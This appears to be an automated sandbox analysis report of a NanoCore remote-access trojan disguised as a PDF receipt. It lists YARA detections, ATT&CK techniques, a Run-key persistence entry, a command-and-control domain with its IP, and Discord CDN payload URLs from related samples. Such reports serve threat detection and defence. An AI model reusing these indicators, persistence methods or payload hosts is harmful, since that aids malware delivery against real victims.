      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\Desktop\eReceiptpdf.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: Amcache.hve.11.drBinary or memory string: c:\users\user\desktop\procexp.exe
      Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.11.drBinary or memory string: procexp.exe

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: eReceiptpdf.exe, 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection112Masquerading2Input Capture11Security Software Discovery231Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol23Jamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 509854 Sample: eReceiptpdf.exe Startdate: 27/10/2021 Architecture: WINDOWS Score: 100 34 zeegod.duckdns.org 2->34 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 6 other signatures 2->50 7 eReceiptpdf.exe 15 2 2->7         started        11 dhcpmon.exe 14 3 2->11         started        signatures3 process4 dnsIp5 36 cdn.discordapp.com 162.159.129.233, 443, 49715 CLOUDFLARENETUS United States 7->36 52 Hides threads from debuggers 7->52 54 Injects a PE file into a foreign processes 7->54 13 eReceiptpdf.exe 1 12 7->13         started        18 WerFault.exe 23 9 7->18         started        20 WerFault.exe 7->20         started        38 162.159.134.233, 443, 49718 CLOUDFLARENETUS United States 11->38 22 dhcpmon.exe 2 11->22         started        24 dhcpmon.exe 11->24         started        26 dhcpmon.exe 11->26         started        signatures6 process7 dnsIp8 40 zeegod.duckdns.org 45.133.1.211, 49716, 49717, 49721 DEDIPATH-LLCUS Netherlands 13->40 28 C:\Program Files (x86)\...\dhcpmon.exe, PE32 13->28 dropped 30 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 13->30 dropped 32 C:\...\dhcpmon.exe:Zone.Identifier, ASCII 13->32 dropped 56 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->56 42 192.168.2.1 unknown unknown 18->42 file9 signatures10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe22%ReversingLabsByteCode-MSIL.Trojan.Zilla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      18.2.dhcpmon.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

      Domains

      SourceDetectionScannerLabelLink
      zeegod.duckdns.org2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      0%Avira URL Cloudsafe
      http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
      zeegod.duckdns.org2%VirustotalBrowse
      zeegod.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      zeegod.duckdns.org
      45.133.1.211
      truetrueunknown
      cdn.discordapp.com
      162.159.129.233
      truefalse
        high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        true
        • Avira URL Cloud: safe
        low
        https://cdn.discordapp.com/attachments/893177342426509335/902653812936949891/4EB2FF9E.jpgfalse
          high
          zeegod.duckdns.orgtrue
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://tempuri.org/DetailsDataSet1.xsddhcpmon.exe, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp, eReceiptpdf.exefalse
          • Avira URL Cloud: safe
          unknown
          http://upx.sf.netAmcache.hve.11.drfalse
            high
            https://cdn.discordapp.comeReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmpfalse
              high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameeReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                45.133.1.211
                zeegod.duckdns.orgNetherlands
                35913DEDIPATH-LLCUStrue
                162.159.129.233
                cdn.discordapp.comUnited States
                13335CLOUDFLARENETUSfalse
                162.159.134.233
                unknownUnited States
                13335CLOUDFLARENETUSfalse

                Private

                IP
                192.168.2.1

                General Information

                Joe Sandbox Version:33.0.0 White Diamond
                Analysis ID:509854
                Start date:27.10.2021
                Start time:03:02:12
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 34s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:eReceiptpdf.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:30
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@14/13@19/4
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 0.1% (good quality ratio 0%)
                • Quality average: 0%
                • Quality standard deviation: 0%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • TCP Packets have been reduced to 100
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 40.126.26.135, 20.190.154.139, 20.190.154.137, 20.190.154.138, 20.190.154.18, 40.126.26.132, 20.190.154.19, 40.126.26.133, 52.168.117.173, 173.222.108.210, 173.222.108.226, 13.107.4.50, 20.54.110.249, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:03:11API Interceptor990x Sleep call for process: eReceiptpdf.exe modified
                03:03:11AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                03:03:28API Interceptor1x Sleep call for process: dhcpmon.exe modified
                03:03:29API Interceptor1x Sleep call for process: WerFault.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                162.159.129.2331PhgF7ujwW.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                vhNyVU8USk.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                Order 4503860408.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                cotizacin.docGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                7G5RoevPnu.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                70% Balance Payment.docGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                TT20201712.docGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
                162.159.134.233mvoElayshk.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
                xuTyOmef1g.exeGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe
                VMKwliCGEP.rtfGet hashmaliciousBrowse
                • cdn.discordapp.com/attachments/785611664095313920/785649743954706472/bin.exe

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                cdn.discordapp.comFWWg6C0DM4.exeGet hashmaliciousBrowse
                • 162.159.133.233
                PmX6Qcb1OH.exeGet hashmaliciousBrowse
                • 162.159.135.233
                payment.exeGet hashmaliciousBrowse
                • 162.159.134.233
                ValorantLogin.exeGet hashmaliciousBrowse
                • 162.159.134.233
                WPFRegisterStudent.exeGet hashmaliciousBrowse
                • 162.159.133.233
                PI 210907-06.docGet hashmaliciousBrowse
                • 162.159.135.233
                cx6hZvW5HV.exeGet hashmaliciousBrowse
                • 162.159.133.233
                vergi #U00f6demesi dekontu 26.10.2021,pdf.vbsGet hashmaliciousBrowse
                • 162.159.130.233
                6iUUqpBnNi.exeGet hashmaliciousBrowse
                • 162.159.129.233
                wnS9iqUWXu.exeGet hashmaliciousBrowse
                • 162.159.129.233
                p9Ts9VV2NZ.exeGet hashmaliciousBrowse
                • 162.159.129.233
                x6d8L7ju1g.exeGet hashmaliciousBrowse
                • 162.159.134.233
                SfFC2cykMw.exeGet hashmaliciousBrowse
                • 162.159.129.233
                0L3hPPGkT5.exeGet hashmaliciousBrowse
                • 162.159.130.233
                2LM4yR5arf.exeGet hashmaliciousBrowse
                • 162.159.134.233
                Hesap hareketleriniz.PDF.exeGet hashmaliciousBrowse
                • 162.159.130.233
                DHL.Shipment1.xlaGet hashmaliciousBrowse
                • 162.159.135.233
                open this if the doesn't work.exeGet hashmaliciousBrowse
                • 162.159.134.233
                DHL.Shipment1.xlaGet hashmaliciousBrowse
                • 162.159.130.233
                PAYMENT-SWIFTCOPY.exeGet hashmaliciousBrowse
                • 162.159.130.233

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                CLOUDFLARENETUSATT51656.htmGet hashmaliciousBrowse
                • 104.16.126.175
                FWWg6C0DM4.exeGet hashmaliciousBrowse
                • 162.159.133.233
                DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                • 162.159.130.233
                PmX6Qcb1OH.exeGet hashmaliciousBrowse
                • 162.159.135.233
                p3IJWYfJZw.exeGet hashmaliciousBrowse
                • 172.67.133.215
                allegato.htmlGet hashmaliciousBrowse
                • 104.16.18.94
                payment.exeGet hashmaliciousBrowse
                • 162.159.134.233
                privatebotavtobus-by_249764151.exeGet hashmaliciousBrowse
                • 172.67.177.45
                PAGOS PENDIENTES XT3503.exeGet hashmaliciousBrowse
                • 172.67.135.253
                agent.exeGet hashmaliciousBrowse
                • 104.21.85.99
                RIVERSEDGE #PO, INVOICE Acknowledge & E- Check Remittance Advice - Copy.htmlGet hashmaliciousBrowse
                • 104.16.126.175
                ValorantLogin.exeGet hashmaliciousBrowse
                • 162.159.134.233
                WPFRegisterStudent.exeGet hashmaliciousBrowse
                • 162.159.133.233
                Wynndevelopment-HTML.HTMLGet hashmaliciousBrowse
                • 104.16.19.94
                VIEW DOCUMENT.htmlGet hashmaliciousBrowse
                • 104.16.18.94
                Bi4P9gzPgEuPau5wQ3n3.exeGet hashmaliciousBrowse
                • 104.21.19.200
                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                • 104.21.19.200
                PO_SBK4128332S.exeGet hashmaliciousBrowse
                • 104.21.19.200
                PI 210907-06.docGet hashmaliciousBrowse
                • 162.159.135.233
                RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                • 104.21.86.112
                DEDIPATH-LLCUSDDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                • 45.133.1.182
                p3IJWYfJZw.exeGet hashmaliciousBrowse
                • 45.133.1.107
                6177fc626d11c.dllGet hashmaliciousBrowse
                • 45.9.20.174
                H5JRlcB50Q.dllGet hashmaliciousBrowse
                • 45.9.20.174
                tHrRhSpGRy.dllGet hashmaliciousBrowse
                • 45.9.20.174
                qQesBb5jg2.dllGet hashmaliciousBrowse
                • 45.9.20.174
                Swit_copy.exeGet hashmaliciousBrowse
                • 45.128.48.160
                IMG20039010262021_Odeme.exeGet hashmaliciousBrowse
                • 45.133.1.84
                6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                • 45.133.1.107
                setup_x86_x64_install.exeGet hashmaliciousBrowse
                • 45.133.1.107
                7lXaD31nA4.exeGet hashmaliciousBrowse
                • 45.9.20.182
                UaHZIE4Jxg.exeGet hashmaliciousBrowse
                • 45.9.20.149
                x1hQGADdLZ.exeGet hashmaliciousBrowse
                • 45.9.20.182
                960.dllGet hashmaliciousBrowse
                • 45.9.20.174
                h0vmra5UH0.exeGet hashmaliciousBrowse
                • 45.9.20.182
                6eFSUWcX1F.exeGet hashmaliciousBrowse
                • 45.9.20.149
                0OeX2BsbUo.exeGet hashmaliciousBrowse
                • 45.133.1.107
                AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                • 45.133.1.182
                FC2E04D392AB5E508FDF6C90CE456BFD0AF6DEF1F10A2.exeGet hashmaliciousBrowse
                • 45.133.1.107
                29669b199ce94a9ee97f8955480b8e8f5b0ed8b38824f.exeGet hashmaliciousBrowse
                • 45.9.20.149

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                54328bd36c14bd82ddaa0c04b25ed9adFWWg6C0DM4.exeGet hashmaliciousBrowse
                • 162.159.129.233
                • 162.159.134.233
                GU5kmLwV7r.exeGet hashmaliciousBrowse
